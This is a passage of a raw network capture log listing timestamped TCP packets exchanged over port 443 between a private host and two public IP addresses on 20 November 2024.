                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617605925 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.617643118 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.618993044 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.619033098 CET44349784104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.619148970 CET49784443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.624841928 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.625128031 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.625149965 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.631433964 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.631608963 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.631614923 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.638878107 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.639208078 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.639214993 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.642618895 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.642646074 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.642720938 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.642741919 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.642872095 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.650398970 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.650417089 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.650528908 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.650542974 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.650675058 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.657522917 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.657548904 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.657618999 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.657635927 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.657742977 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.665725946 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.665743113 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.665776014 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.665854931 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.665862083 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.666062117 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.673917055 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.673932076 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.674025059 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.674038887 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.674245119 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678168058 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678230047 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678253889 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678289890 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678316116 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678316116 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678339958 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678358078 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678373098 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678411007 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.678428888 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.679364920 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.679413080 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.679446936 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.679471016 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.679471016 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.679526091 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.680047989 CET49786443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.680077076 CET44349786104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.680778027 CET49773443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.680787086 CET44349773104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.683877945 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.683893919 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.692648888 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.692681074 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.692740917 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.692967892 CET49792443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.692977905 CET44349792104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.725824118 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.725941896 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.725990057 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.726027012 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.726044893 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.726068020 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.726094007 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729341984 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729439974 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729480982 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729521036 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729542971 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729571104 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729608059 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729614973 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729623079 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729674101 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.729793072 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.731787920 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.731872082 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.731880903 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.737998962 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.738092899 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.738101959 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.744528055 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.745263100 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.745418072 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.745438099 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.746433973 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.746527910 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.747822046 CET49787443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.747838974 CET44349787104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.748213053 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.748290062 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.748296976 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.755434990 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.755491972 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.755496979 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.767121077 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.767128944 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.767214060 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.767220020 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.775800943 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.775861979 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.775868893 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.775928020 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.779623985 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.783622026 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.784269094 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.784281969 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.784718990 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.791704893 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.791718960 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.791774035 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.793354988 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.799592972 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.799602032 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.799654007 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.807720900 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.807729006 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.807804108 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.811950922 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.811959982 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.812103033 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.820147991 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.820261955 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.827898026 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.828049898 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.832233906 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.832468987 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.840029955 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.840142012 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.846239090 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.850378036 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.850544930 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.850572109 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.850593090 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.851068974 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.936428070 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.940591097 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.940658092 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.940675974 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.943689108 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.943794012 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.949445963 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.949652910 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.950603962 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.950633049 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.950649977 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.950666904 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.950737953 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.956082106 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.956151009 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.958251953 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.959193945 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.959337950 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.965661049 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.965770960 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.965867996 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.965975046 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.965991020 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.971780062 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.971945047 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.974109888 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.974217892 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.974236012 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.975626945 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.975954056 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.980914116 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.980990887 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.981431961 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.981487989 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.981497049 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.986288071 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.986465931 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.989144087 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.989355087 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.993956089 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.993988991 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.994048119 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.994056940 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.994103909 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.994945049 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.995034933 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:41.999855042 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.000734091 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.000859022 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.005635023 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.005688906 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.005697966 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.006772995 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.006854057 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.009912968 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.009988070 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.011285067 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.011415958 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.011424065 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.015681028 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.015755892 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.017291069 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.017642021 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.017651081 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.020035982 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.020159960 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.023034096 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.023189068 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.023196936 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.025914907 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.026021004 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.073827982 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.104091883 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.107741117 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.107769966 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.108218908 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.108619928 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.108799934 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.108805895 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.110730886 CET44349788104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.136598110 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.136681080 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.141379118 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.141854048 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.143865108 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.144098997 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.146984100 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.148591995 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.149111032 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.149164915 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.149178982 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.150356054 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.151159048 CET49788443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.155467987 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.155503035 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.155672073 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.155672073 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.155690908 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.155910969 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.158401966 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.158457041 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.158466101 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.158592939 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.159584999 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.160259008 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.162343025 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.162359953 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.162388086 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.164400101 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.165457010 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.166385889 CET44349781104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.166534901 CET49781443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.170615911 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.170666933 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.170675993 CET44349783104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.170717955 CET49783443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:42.171148062 CET44349781104.16.102.112192.168.2.12
